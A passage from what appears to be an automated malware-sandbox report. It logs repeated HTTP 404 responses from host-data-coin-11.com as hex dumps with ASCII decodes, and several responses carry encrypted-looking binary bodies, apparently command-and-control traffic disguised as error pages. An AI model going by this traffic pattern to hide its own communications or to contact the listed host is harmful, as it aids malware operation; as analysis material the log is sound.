2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:29:26 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 62 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 13 49 3c 5c a2 f7 d8 fc fb 46 f5 46 86 32 ef 06 10 c2 4b e1 e1 39 0d 0a 30 0d 0a 0d 0a Data Ascii: 2bI:82OI<\FF2K90
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:29:29 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:29:29 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:29:29 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 36 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 84 42 09 25 16 f9 b5 8f bd b8 15 a5 0c ce 2c b4 59 52 db 04 e5 fd 28 e3 22 58 1b b2 ed cf 00 b4 51 da 44 d0 f8 20 8c 21 ea ad 96 56 2c e4 b4 48 2b e3 b3 b6 68 f3 9a b9 59 a8 77 9f cb 31 41 5b 3d 03 4b de bb 4b bb ff 5b 91 ad d3 02 c4 60 9d d2 69 0d 0a 30 0d 0a 0d 0a Data Ascii: 66I:82OB%,YR("XQD !V,H+hYw1A[=KK[`i0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:29:31 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:29:31 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:29:31 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 63 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 1e 49 3a 44 a6 e8 de ea e4 40 fd 45 91 6e b8 57 5b 91 17 bf ec 31 e5 0d 0a 30 0d 0a 0d 0a Data Ascii: 2cI:82OI:D@EnW[10
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:29:53 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:29:54 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:29:54 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:29:54 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:29:54 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:29:54 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:29:55 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 